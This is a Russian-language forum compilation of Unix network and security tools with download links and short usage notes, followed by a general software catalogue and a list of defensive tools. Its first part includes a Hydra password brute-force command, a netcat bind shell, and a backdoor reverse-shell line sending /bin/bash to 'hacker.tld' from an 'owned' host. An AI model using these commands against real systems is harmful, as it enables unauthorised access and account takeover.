Некоторые тулзы (вроде обзора). THC Hydra http://thc.org/download.php?t=r&f=hydra-4.7-src.tar.gz Брутфорс для огромного кол-ва сервисов. POP3, IMAP, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTPS-HEAD (SSL), ICQ, FTP, PostgreSQL, MySQL, SSH, Telnet, Netbios, LDAP NNTP, VNC ... и т д. Правда, POP3 и IMAP на распространенных сервисах им брутить врядли удасться, попробовать стоит. Модуль ICQ устарел и тоже не работает. Чтобы использовать остальное, читайте мануалы в архиве. Сначала стянем архив. Code: wget http://thc.org/download.php?t=r&f=hydra-4.7-src.tar.gz Распакуем Code: gzip -d hydra-4.7-src.tar.gz tar -xf hydra-4.7-src.tar или Code: tar -xzf hydra-4.7-src.tar.gz И ставим Code: cd hydra-4.7-src ./configure make make install можно копирнуть назад и удалить исходники Code: cp hydra .. cd .. rm -rf hydra-4.7-src Работаем Code: ./hydra (для справки) ./hydra -l lamer -P pass.txt -w 20 -t 10 pop.server pop3 для подбора пароля из словаря pass.txt к логину lamer на сервере pop.server, timeout=20 sec, потоков 10. NETCAT http://online.securityfocus.com/data/tools/nc110.tgz Ненадо комментировать. Утилита служит например при back-connect'е, или если надо пройти квест, отправляя на сервер произвольные ХТТП пакеты. Прослушка порта Code: nc -l -p [PORT] -t Коннект Code: nc server port Типа bindshella Code: nc -l -p 28876 -t -e cmd.exe NMAP http://download.insecure.org/nmap/dist/nmap-3.81.tar.bz2 Сканнер. Для некоторых флагов нужны права root. Установка: Тут у нас архив bzip. => Code: bzip2 -cd nmap-VERSION.tar.bz2 | tar xvf - cd nmap-VERSION ./configure make make install Использование. Все не опишешь, читайте мануалы. Например Code: ./nmap -p 1-65535 server TCPDump http://www.tcpdump.org/release/tcpdump-3.9.3.tar.gz Читаем http://www.tcpdump.org/ TCH amap http://www.thc.org/download.php?t=r&f=amap-5.1.tar.gz Установка не отличается от hydrы. PuTTy PuTTy http://www.tartarus.org/~simon/putty-snapshots/x86/putty.exe Gen http://www.tartarus.org/~simon/putty-snapshots/x86/puttygen.exe исходники http://the.earth.li/~sgtatham/putty/latest/putty-0.58.tar.gz PSFTP http://www.tartarus.org/~simon/putty-snapshots/x86/psftp.exe Хотя для Windows, я написал ее в этот топик. Это клиент SSH, Telnet, и др. С настройкой цветов, соотв. клавишь, звуков (динамика) и т д John the Ripper UNIX http://www.openwall.com/john/c/john-1.6.tar.gz WINDOWS http://www.openwall.com/john/c/john-16w.zip DOS http://www.openwall.com/john/c/john-16d.zip Крякер хешей (подбор конечно). Обычно юзают для подбора DES. Code: john ---------------------------------
Нессус - сканер багов в шлюзовых интерфейсах (cgi-сканнер в народе) Code: emerge nessus или Code: apt-get nessus и т.д. для разных дистров
Nikto Не очень мощьный но правда развивающийся cgi-сканер Nikto Code: http://www.cirt.net/nikto/nikto-current.tar.gz Unix Requirements PERL module NET::SSLeay PERL module LibWhisker (LW.pm is included with source) OpenSSL (only required if SSL scans are needed) Code: nikto [-h target] [options] и полный README
OpenSSL http://www.openssl.org/ Пояснять думаю ненужно. LSOF ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/ Открытые файлы, смонтированые в /proc процессы... показывает Hunt http://lin.fsid.cvut.cz/~kra/index.html#HUNT Пакетный (rawsocket) сниффер NetFilter http://www.netfilter.org/ Фаер/Фильтр. Не пользовался, но думаю вещь ничего...
Shadowinteger's Backdoor Shadowinteger's Backdoor, Netcat-clone, утилитка для удаленного администрирования, защищённой отправки файлов, и p2p чата. качаем: Code: wget http://tigerteam.se/dl/sbd/sbd-1.36.tar.gz Code: tar -zxvf sbd-1.36.tar.gz установка: Code: make unix пример на бэкконект: Code: user@owned# ./sbd -r1800 -Don -e /bin/bash hacker.tld 993 Readme в архиве объясняет как пользоватса.
Ethereal - сниффер, имхо, один из луччих. Работа с любыми сетевыми интерфейсами, arp-spoofing, гибкая система фильтров. http://www.ethereal.com/download.html EncFs - тулза для создания зашифрованой виртуальной файловой системы http://arg0.net/wiki/encfs
Base64 - простая програма для конвертирования текста в base64 и обратно. http://www.fourmilab.ch/webtools/base64/ apg - Автоматический генератор паролей, использующий несколько надёжных алгоритмов. http://www.adel.nursat.kz/apg/ Authforce - HTTP брутфорсер. использует различные методы брутфорса пары логин/пароль для доступа к сайту. http://kapheine.hypa.net/authforce/ Bjorb - софтина для создания безопасного интернет соединения через ебезопасную сеть типа Internet. фишки: 1. шифровка/расшифровка любого соединения на "статическом порту" при помощи SSL 2. ограничение доступа по IP адресам http://www.hitachi-ms.co.jp/bjorb/ Doorman - бесшумный, невидимый а всех TCP портах сервер который откроет свою дверь тому, кто знает, секретный стук. http://doorman.sourceforge.net/ (backdoor короче.) Fcrackzip - быстрый зломщик паролей к .zip архивам, аписаный на Си с включением кода на x86 ассемблере. Позволяет пользователям восстановить забытые пароли, используя брутфорс или подбор по словарю. http://www.goof.com/pcg/marc/fcrackzip.html kssh - графический интерфейс а-ля putty для SSH. http://kssh.sourceforge.net L0phtCrack - программа для расшифровки виндовский LANMAN и NT паролей (брутфорс и по словарю). http://www.atstake.com/products/lc/ mdcrack - брутит MD4 MD5 и NTLM1 хеши http://membres.lycos.fr/mdcrack/download/mdcrack-1.2.tar.gz Slurpie - подборщик паролей passwd, может работать в режиме распределённых вычислений. ftp://ftp.openbsd.org/pub/OpenBSD/distfiles/slurpie-2.0b.tar.gz
rmt rmt используется другими программами для удаленного управления приводом магнитных лент. tar tar - программа архивации, сохраняющая и извлекающая файлы из архивов tar.
Сборник полезных Unix программ! Название проги: Kaspersky Anti-Spam Тип проги: Anti-Spam Лицензия: Бесплатна Интерфейс: Русский Подробное описание: Система фильтрации спама, предназначенная для защиты корпоративных и провайдерских сетей. Cпособна самостоятельно анализировать текст письма и отсеивать нежелательную корреспонденцию благодаря технологии лингвистического анализа писем. Благодаря технологии Urgent Detection System (UDS), Kaspersky Anti-Spam, кроме традиционных обновлений по расписанию, использует мгновенные запросы к серверу, что позволяет заблокировать нежелательные письма уже через секунду после обнаружения образца рассылки спам-аналитиками "Лаборатории Касперского". Линк для закачки: Скачать Название проги: Nmap 4.1 Тип проги: Сканер Лицензия: Free Интерфейс: Русский Подробное описание: Сетевой сканер - Nmap (Network Mapper) обследует сети и проводит аудит защиты. Поддерживается как режим командной строки, так и режим графического интерфейса. Линк для закачки: Скачать Название проги: Opera for *NIX 9.01 Final Тип проги: Браузер Лицензия: Free Интерфейс: Русский Подробное описание: Компактный пакет быстро работающих коммуникационных программ , в который входят веб-браузер, почтовый клиент, RSS-ридер и IRC-клиент, а также плюс качалка файлов, включая через torrent-сеть Линк для закачки: Скачать Название проги: Mozilla Firefox for Linux Тип проги: Браузер Лицензия: Free Интерфейс: Русский Подробное описание: Быстро работающий браузер, причем быстрота работы заметна не только во время загрузки веб-страниц, но и при поиске в закладках и Истории. Сделан он на основе движка Mozilla и позволяет просматривать все веб-страницы в одном многовкладочном окне, а также обладает множеством других полезных опций, включая способность значительного расширения возможностей подключением плагинами. Линк для закачки: Скачать Название проги: Sendmail Тип проги: Передача почты Лицензия: Free Интерфейс: Английский Подробное описание: Широко используемая программа передачи почты для unix-систем. Sendmail обеспечивает работу модульной системы рассылки, которая предназначена для получения и отправки корреспонденции, а также управления программами подготовки и просмотра почтовых сообщений. Sendmail позволяет организовать почтовую службу локальной сети и обмениваться почтой с другими серверами почтовых служб через специальные шлюзы и может быть сконфигурирована для работы с различными почтовыми протоколами. Линк для закачки: Скачать Название проги: Simple Instant Messenger Тип проги: Общение Лицензия: Free Интерфейс: Английский Подробное описание: программа для обмена мгновенными сообщениями c поддержкой приема и отправки SMS, приемом и отправкой сообщений в формате RTF, передачей файлов и многим другим, в том числе возможностью использования в сетях ICQ, Jabber, MSN, Yahoo!, LiveJournal. Линк для закачки: Скачать Название проги: Linphone 1.3.5 Тип проги: Веб-телефон Лицензия: Free Интерфейс: Английский Подробное описание: еб-телефон для GNOME. Позволяет осуществлять двусторонние голосовые переговоры по IP-сетям (в т.ч. по Интернету). Может соединяться с другими веб-телефонами, работающими по протоколу SIP. Может использоваться как на высокоскоростных линиях, так и на медленных модемных соединениях. Линк для закачки: Скачать
Название проги: MPlayer 1.0pre8 Тип проги: Мультимедийный плеер Лицензия: Free Интерфейс: Русский Подробное описание: Мультимедийный плеер. MPlayer поддерживает широкий диапазон кодеков и форматов файлов, включая MPEG 1/2/4, DivX 3/4/5, Windows Media 7/8/9, RealAudio/Video (до версии 9 включительно), а также Quicktime 5/6 и Vivo 1/2. Без проблем проигрывает VCD и DVD, в том числе с показом субтитров. Несмотря на то, что В Mplayer имеется множество собственных оптимизированных аудио и видео кодеков, возможно подключение к нему дополнительных бинарных кодеков XAnim и RealPlayer и кодеков Win32 из DLL библиотек, что позволяет плееру проигрывать чуть ли не все существующие форматы видеосигналов. Кроме этого, поддерживается конвертация всех поддерживаемых форматов в raw/divx/mpeg4 AVI, а также видеозахват с V4L устройств. Наконец, поддерживается и изменение графического интерфейса с помощью скинов. Линк для закачки: Скачать
Picasa for Linux Название проги: Picasa for Linux Тип проги: Графика Лицензия: Бесплатна Интерфейс: Английский Подробное описание: Picasa for Linux - Программа для работы с изображениями. Позволяет искать, редактировать и печатать фотографии, а также обмениваться ими. При каждом запуске Picasa автоматически определяет местоположение фотографий на жестком диске и сортирует их в визуальные альбомы, упорядоченные по датам, так что потеряться ни одной картинке не удастся. Линк для закачки: Скачать
Ubuntu Center Alpha v.1 Название проги: Ubuntu Center Alpha v.1 Тип проги: Мультимедия Лицензия: Бесплатна Интерфейс: Английский Подробное описание: Ubuntu Center - Центр управления мультимедийными приложениями дистрибутивов семейства Ubuntu (Ubuntu Breezy, Kubuntu, XUbuntu, nUbuntu). Включает в себя аудиобиблиотеку, библиотеку графических файлов, хранилище закладок, календарь, информация о скаченных/отправленных файлах и модуль администрирования Линк для закачки: Скачать
Сканер портов amap - инструмент для сканирования, позволяющий удаленно идентифицировать приложения, выполняющиеся на определенном порту. Скачать KDE Network Mapper - утилита для создания карты сети, тестирования и сканирования. Скачать Remote nmap (Rnmap) – программа, позволяющая удаленно просматривать порты, используя централизованный сервер. Скачать GnoScan – мультипоточный сетевой сканер с графическим интерфейсом для GNOME. Скачать
security soft SARA (SARA) Security Auditor's Research Assistant инструмент для анализа защиты системы. Скачать chkrootkit Chkrootkit – инструмент, проверяющий локальную систему на признаки заражения rootkit. Скачать Rootkit Hunter 1.2.9 Rootkit Hunter сканирует файлы на системе на предмет обнаружения известных и неизвестных руткитов, бэкдоров и снифферов. Скачать incident.pl 2.9 Скрипт для автоматического уведомления о нарушении безопасности Скачать Process Change Detection System 2.9 Process Change Detection System – это скрипт, написанный на Perl, позволяет следить за появлением новых процессов в системе(например backdoor). Скачать File::Scan 1.40 Модуль File::Scan может использоваться как многоплатформенный интерфейс для написания сканера для обнаружения Windows/DOS/Mac вирусов Скачать Tiger security tool 3.2rc3 Tiger - набор Bourne shell scripts, C программ, и файлов данных, которые используются для ревизии защиты Unix систем. Скачать IRC Defender Утилита для защиты IRC сетей, написанная на Perl. Скачать sptrace 1.4.0 Это безопасный ptrace() модуль для Linux. Скачать Injector Linux 1.4 Это операционная система Linux на одном флоппи-диске. Скачать cipherfunk Patched Linux Kernels | 2.4.20-fnk2 cipherfunk Patched Linux Kernels – исправление к LINUX ядру, обеспечивающее более устойчивую работу, оптимизацию и защиту. Скачать Leka Rescue Floppy v0.7.0 Leka Rescue Floppy - минираспределение Linux, которое помещается на один гибкий диск. Скачать Saint Jude, Linux Kernel Module 0.22 Saint Jude- модель для обнаружения неправомочных или неподходящих изменений привилегий. Скачать LOMAC 1.1.2 LOMAC - расширение защиты для Linux, который использует Low Water-Mark Mandatory Access Control, чтобы защитить целостность процессов и данных от вирусов, троянских коней, злонамеренных удаленных пользователей и и опасных процессов ядра. Скачать KSTAT - Kernel Security Therapy Anti-Trolls v1.1-2 KSTAT - инструмент для обнаружения нападения в обход различных методов сокрытия Скачать Linux Security Auditing Tool v0.8.1 Linux Security Auditing Tool (LSAT) - инструмент ревизии защиты LINUX/UNIX. Скачать Rkdet 0.54 Rkdet - daemon, который обнаруживает попытку установки rootkit или сниффера. Скачать Sysstat v4.1.6 Пакет sysstat выводит отчет о работе системы, использует информацию команд sar и iostat. Скачать Swatch 3.0.8 Swatch – утилита для активного мониторинга журналов регистрации. Может контролировать практически любые типы лог файлов. Скачать RotoRouter 1.9b RotoRouter – подмена стандартной UNIX udp-основанной программы traceroute. Скачать Libsafe v2.0-16 Libsafe позволяет защититься от атак типа format string и buffer overflow. Скачать
Axel 1.0b Название проги: Axel 1.0b Тип проги: менеджер закачек Лицензия: GPL Интерфейс: Английский Подробное описание: Маленький, но очень удобный в использовании менеджер закачек/акселератор. Работает из коммандной строки и требует очень мало ресурсов системы. Поддерживает большое количество unix-like систем и обладает стандартным набором функций дял программ данного класса. Линк для закачки: Скачать
DBF Viewer and Editor 2.99.02 Название проги: DBF Viewer and Editor 2.99.02 Тип проги: Работа с DBF-файлами Лицензия: Commercial Интерфейс: Английский Подробное описание: Консольная программа для просмотра и правки DBF-файлов. Наиболее частые применения данной программы: клавиатурные макросы, работа с выбранной строкой в DBF-файле, экспорт в другие форматы TXT, CSV, SQL, HTML. Линк для закачки: Скачать